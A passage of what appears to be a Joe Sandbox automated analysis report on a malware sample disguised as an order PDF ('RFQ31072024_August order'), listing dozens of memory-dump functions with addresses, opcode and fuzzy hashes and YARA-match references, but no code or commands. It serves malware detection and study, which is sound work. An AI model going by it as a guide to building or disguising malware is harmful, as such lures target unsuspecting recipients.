Instruction ID: 304083db82bcad8e3e8a6c545494f1d85a9f90434223315307d551dc387b030d
Opcode Fuzzy Hash: 695d31f86d9e1dcad19b6b3d4b15e8ed66009d7cd20ddd3c99795e954f908165
Instruction Fuzzy Hash: 4C01D431610905DFD714DFA9DC14ABE77EAFF80A10F09406D9D01AB240DE60D801C690

Function 0167EB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1a77e32de2941a0ac08d26b7fdbea1455cbeec83db519131c776ce99598d09fa
Instruction ID: cdd3413a33a0dc58e21e08aa86184f9a254b3d358108209f0bd84ae9e07f4283
Opcode Fuzzy Hash: 1a77e32de2941a0ac08d26b7fdbea1455cbeec83db519131c776ce99598d09fa
Instruction Fuzzy Hash: 8401DF72680702AFD3315E19DD00B32BAA8EF55F50F01446EE2068F3A0D7B1D8418B68

Function 015D2582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54db08fa82ffa7b5ab1ece2105242e7826dce7c02acf75a7392ce2783ccaa1c3
Instruction ID: a1020cb8c9786dfcd8577c6b78e63e97d749fede40b6e337b7f349571f572eed
Opcode Fuzzy Hash: 54db08fa82ffa7b5ab1ece2105242e7826dce7c02acf75a7392ce2783ccaa1c3
Instruction Fuzzy Hash: D1F0D132A41B21ABC7319B5A8C44F57BAA9FBC4A90F004428A60A9B640DA30ED01CBA0

Function 015FC073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: cbbbb6d06c6c8a8b2c447d87337c8133a23c64230258a2f8e1968adf129c7487
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: 6BF0C2B3A00615ABD324DF4DDC40E6BFBEEEBD1A80F04812CA605CB220EA31DD05CB90

Function 015CC310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: c4b6e594d1928bc56df0594ac2d76c2df7ce846af043b3db101da44b1ac5e08d
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 01F0C233204A239FD7325ED99840B2FAA95AFD1E64F1A007DF20E9F604CA648D0297D0

Function 0160CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: 8bf1156d4d88601238378eaa4206c4c08abe03d350743116464c9879fa45ca83
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 6D01D1326016859BD327976DCD09F5ABBDDEF81754F0841A5FE048F7A1D77AC841C220

Function 016A61E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee2d91689df3385600c6a87ed9d9700ef3b7a5fe7f4ab05d34d9dc975e30e735
Instruction ID: 03dd8004919fa84bfabc516d336550056df3180adf5ce4e2647bd4d96710e26b
Opcode Fuzzy Hash: ee2d91689df3385600c6a87ed9d9700ef3b7a5fe7f4ab05d34d9dc975e30e735
Instruction Fuzzy Hash: FF014F71A00249DFDB04DFA9D945AEEBBF8BF58350F14405AE505AB380D774EA01CB98

Function 016563C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: 96c6187ca3bc0953375cf4696a813ea44bc29946370d8359e8e92b2b14ae46e1
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: 4CF0127210001EBFEF019F94DD80DAF7B7EFF55298B104165FA1196160D631DD21E7A0

Function 0165A4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5389d193847442bbde31be39ac733e8feb2d6d2a164a6f31e2c685cf8a6d1310
Instruction ID: 055359648ee47e0425ffaf328ab21d6a9b66753bea7259b150a77d049d6cdfa7
Opcode Fuzzy Hash: 5389d193847442bbde31be39ac733e8feb2d6d2a164a6f31e2c685cf8a6d1310
Instruction Fuzzy Hash: 65018536100209AFCF129E84DC40EDA3F66FB4C768F068205FE1966220C732E971EB81

Function 015CC0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1087a5e86576f0025fbb9755ab04cb6273f71e914f96434eb9e851e8f34128c
Instruction ID: 195b1f927ff94879a7e94e28aa9f781393e0d72282431a19ea3fe4305e836304
Opcode Fuzzy Hash: c1087a5e86576f0025fbb9755ab04cb6273f71e914f96434eb9e851e8f34128c
Instruction Fuzzy Hash: D9F024717442425FF3249A9A9C01B3632DAF7C8A50F69846EEB0D8F2C1E971DC018394

Function 0160656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7613ed5725ae26951b814b2b4d73d26a3d8a55f56e1292bc6d64d9523a12414
Instruction ID: ceb0d871b7bce6645abd22ee3ec05daf0e3b46e3d702a59de64902d28f45801f
Opcode Fuzzy Hash: d7613ed5725ae26951b814b2b4d73d26a3d8a55f56e1292bc6d64d9523a12414
Instruction Fuzzy Hash: F901A4706007859FE327972CCD49B2637E5BB40B44F484194BA019BBE6EB69E4128214

Function 0167437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: 51b029b7e28590db0aee1b426d1cf07e51dd79ecff86f7d55149856c444b3aa0
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 80F0E935341E2347EB36AA2F8C28B3AA696AFD0A60B05072C9619CB7C0DF20DC018780

Function 0165E872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: 42d3fd4addde9a4c64795693cf418115a735955640540853b44fb03632b5f206
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 81F0B432B505129BDB618A4DCC80F12F7A8BFD5A60F1A0064AA089F760C362ED0287D0

Function 0165C89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ec63f513043c8cdc420e1f5e77c177ef71c84a77d35d00ea99bc93c9814711
Instruction ID: f79541e40282054abf9fc18e04af5f0a2e7ebb99b333920af0b9368af0a728a5
Opcode Fuzzy Hash: a3ec63f513043c8cdc420e1f5e77c177ef71c84a77d35d00ea99bc93c9814711
Instruction Fuzzy Hash: B0F0C2706053059FC354EF28C946A1BBBE8FF98710F44465EBC98DB394EA34E901C796

Function 01600854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 323114b2b72ada9712516d6c5db718c46e0fedd9eadb5484d44a1f776b293dea
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: 5DF0B472610205AFE719DF25CC05F57B6E9FF99344F258078A545DB2E0FAB0DE01C654

Function 01658D20 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1088a5accf5e19454c9733c9b6ba694bd4d215ff4e35071f2719ec8c887f47a7
Instruction ID: 5d4eb1208d872d55b1cb6435736950a32e1749a23ff47030e2bedcc26b4db9d2
Opcode Fuzzy Hash: 1088a5accf5e19454c9733c9b6ba694bd4d215ff4e35071f2719ec8c887f47a7
Instruction Fuzzy Hash: F5F090336002446FE7316A1DAC48B6BFBDEFBD4720F095519FD462B61187346C90CB80

Function 0165C912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8853e37d07700e36ca221fb0e088cf0e75f091b50790b6217c8016db165ee8
Instruction ID: 1ee9a94097761541f19fe05c76f53c1a03d7e0e01c0dd9b3e7ed0a71e1b9d1e0
Opcode Fuzzy Hash: cd8853e37d07700e36ca221fb0e088cf0e75f091b50790b6217c8016db165ee8
Instruction Fuzzy Hash: D6F06270A0124DDFCB04EF69C915A6EB7F8FF58340F008059B955EB385DA78EA01CB54

Function 015D47FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c041ccf3489bee23ce2fc1ae00d24effdb5f0c2436fefd1e3b1e1544e8a5b3eb
Instruction ID: 6cfddd92bc4f657913871ed0b4f53e26938c5bbaaa65bfa6552a11a1b8d8890e
Opcode Fuzzy Hash: c041ccf3489bee23ce2fc1ae00d24effdb5f0c2436fefd1e3b1e1544e8a5b3eb
Instruction Fuzzy Hash: D2F0B4319167E19FE732CB5CC45DB29BBD4BB016A0F08496AD549CFD02C774D880C750

Function 01690115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c339d586dda1c0a840f9b7c52f3306ff8b7e1aeb9b27092c6a489117d080883f
Instruction ID: 897b019aad92ba187a7c7ecf5803744d86dd4124c65fdf6e4b1c0e20b2deeb89
Opcode Fuzzy Hash: c339d586dda1c0a840f9b7c52f3306ff8b7e1aeb9b27092c6a489117d080883f
Instruction Fuzzy Hash: B8F027A64156811FCF326B6CEC502E13F6EA741514F092089D4A0A7305C7748493C368

Function 0160C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a4c9c633dc7f092f2eb006396928b01b92fb23310df0e8d959df52c70c6697
Instruction ID: f9665563da3c430a73c99e410f84d24998be81c359e095bbd0182c2c20972d8b
Opcode Fuzzy Hash: e9a4c9c633dc7f092f2eb006396928b01b92fb23310df0e8d959df52c70c6697
Instruction Fuzzy Hash: 39F0BE71932A619BE33B965CCD88B137BE4AB416A0F0896A5D906C7692C760E881CA50

Function 01612619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: ab70a79ab45a066ecb3e7492fd7f6a89c1c6d33407407d390b1c317ee55036c3
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: C6E0D8323006416BE7119E598CD4F5777AFEFD2B14F18047DB5045F296CAE2DC0986A4

Function 01666030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: d5a2246e18287822ae08040a2941dd1185c05a785bb52a066011fc71c2080f0e
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: C3F01C72114204AFE3218F1AEE44B52BBFCEB55364F55C065E6099B661D379EC40CBA4

Function 015D0710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 058cb7056930cd1d38d24ef1aedfcc081b1ccf3405e1059896db548fe580f0ca
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: D2F0E53A2047559BDB2ADF19C440A957BE4FB41350F010494FC528F351E732E981CF94

Function 016049D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: eee4270ee221f35ca84a7e3e43e76e10522fd9536e8a54f693e4c20d43135243
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: B9E09232254145ABD73A2A598C00B6776A6ABD07A0F150429EB008B298DF74DC81D798

Function 0167678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 6d3e0e956515ce5e58eb9e783fb63798f9636f84a29645c07331e2345caba9ee
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: 75E0DF33A00510BBEB22A799CD06FABBEADEB90EA0F050094B601EB1D0E530DE04D690

Function 015D25E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8964e338dc4c387ad81d3e06f77c8472e44d77d876bdbddb826e48d6e5e620c0
Instruction ID: 1ce74873ef4faf086d0b05f99077bce33d78663b0a6693cb386b75b214722122
Opcode Fuzzy Hash: 8964e338dc4c387ad81d3e06f77c8472e44d77d876bdbddb826e48d6e5e620c0
Instruction Fuzzy Hash: B4E092321006959BC321FB2ADD11F9A77AAFFA0364F114519B1155B190CB30A810C798

Function 01654000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 0f22fc9fc1c4d9c7d22deae0ab6f8558ef538ef1f7c551f8f884c729614f133b
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 70E0C2343003058FE755CF19C844B627BB6BFD5A10F28C0A8A9488F309EB32E882CB40

Function 0160CA38 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd717ee8b38b5d8b369d385a46c4685cae839113abbf9463b10d69a03588dd3b
Instruction ID: d0a0d242697012e6f2be39cc578afc8279a1d39ac9bd0743e97bcd3cd31fdf57
Opcode Fuzzy Hash: bd717ee8b38b5d8b369d385a46c4685cae839113abbf9463b10d69a03588dd3b
Instruction Fuzzy Hash: BBD02B324910216ECB3FE228BC04FA73A9AAB80320F0588E0F908D6091D518CCC182D4

Function 015C823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: d59d8e7c49415e6b1e16c11f6da313d1b93c43f597cac3e6b01eebb3a8b2d666
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: F2E08C31400A21EEDB322E55DC18B5176E2FF94F10F24482DE0861E1A887B0A881DA48

Function 015D2050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50007e79989d73704ad7485dd84fbf35f7874a1ddc3c0a35f8aeee6444b9c14
Instruction ID: 23df083cdfad78cdf53e1fd2962bb15a23764906b54c48c885adc79ef03cf450
Opcode Fuzzy Hash: b50007e79989d73704ad7485dd84fbf35f7874a1ddc3c0a35f8aeee6444b9c14
Instruction Fuzzy Hash: 81E0C2321005616BC321FB5EDD10F5A739EFFE4260F000121F1558B694CB70EC10C798

Function 01608A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 1501b41a2883d5faaf204b3ed6e713ba5fea8acc08ca63a36a06cf1ea6fba85e
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: EBE08633511A1887C729DE18D911B7377A8EF45720F09463EAA13477C1C634E544C794

Function 00417D98 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ca21914ddc1d2dfd674e34a8bee333cf9a3426e4f30b98f62c63be750bd36be
Instruction ID: 160b6c2a6e5c7cd3182490d42a0987f71c803081d3adb53cc4b8a483d5d974c9
Opcode Fuzzy Hash: 0ca21914ddc1d2dfd674e34a8bee333cf9a3426e4f30b98f62c63be750bd36be
Instruction Fuzzy Hash: 81D01237F450165E57119E09B8804B4F3B0E2CA265B9163B7DA0DEB581D577CA4782CE

Function 00417306 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1488235517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RFQ31072024_August order_pdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8683cf588adddc8bc25eff97b3d0144e600635bc67e9f71de7a00202efeea77
Instruction ID: 3f0b23f1e42e1aba10790899f56bc0de26db1d487fc7b5cb92605fee62a53179
Opcode Fuzzy Hash: b8683cf588adddc8bc25eff97b3d0144e600635bc67e9f71de7a00202efeea77
Instruction Fuzzy Hash: 4ED0A946A0E2E20287220AA974602B4FF60648342560A32EFC9E89B282DA0180268B64

Function 01626AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: 64c285ad31954e731e48643f986a1c3c61773a3a4b270100a29146b9e9537a51
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: EFD05E36911A50AFC3329F1BEE04D13BBF9FFC4A10705066EE94683A20C770E806CBA0

Function 0160E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: 8db3180c99d4511aebd581acab6ebef63df7708c02476e9663a2861fc76d25c3
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: BAD0A932A64A20ABD772AA1CFC04FC333E8BB88724F060499B009CB150C360EC81CA84

Function 0164E908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: 543d1e58dff7d50ac4ca6f9409ff2a79aabb9d4f13b578b91bfd016076b93ba0
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 05E0EC359506859BDF66DF59CA44F5ABBF5FB94B40F150458A1085F660C729E900CB40

Function 015CA0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1490188628.00000000015A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_15a0000_RFQ31072024_August order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: 9c8ab9e76f86fc253de8d91bd47716ccda1f12a0ff3c0afd712860b31b2a8cfc
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 80D022326220319BCB285A95AC04F676D45BFC0EE0F0A006C340BAB800C1048C42C2E0

Function 0160A830 Relevance: .0, Instructions: 14COMMON

